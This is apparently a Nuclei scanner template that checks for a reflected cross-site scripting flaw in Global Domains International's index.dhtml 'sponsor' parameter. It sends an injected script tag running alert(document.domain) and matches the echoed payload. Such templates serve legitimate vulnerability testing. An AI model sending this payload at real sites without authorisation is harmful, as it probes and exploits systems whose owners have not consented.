nuclei-templates/vulnerabilities/other/global-domains-xss.yaml

31 lines
642 B
YAML

id: global-domains-xss
info:
name: Global Domains International XSS
author: princechaddha
severity: medium
reference:
- https://cxsecurity.com/issue/WLB-2018020247
tags: globaldomains,xss
requests:
- method: GET
path:
- "{{BaseURL}}/index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200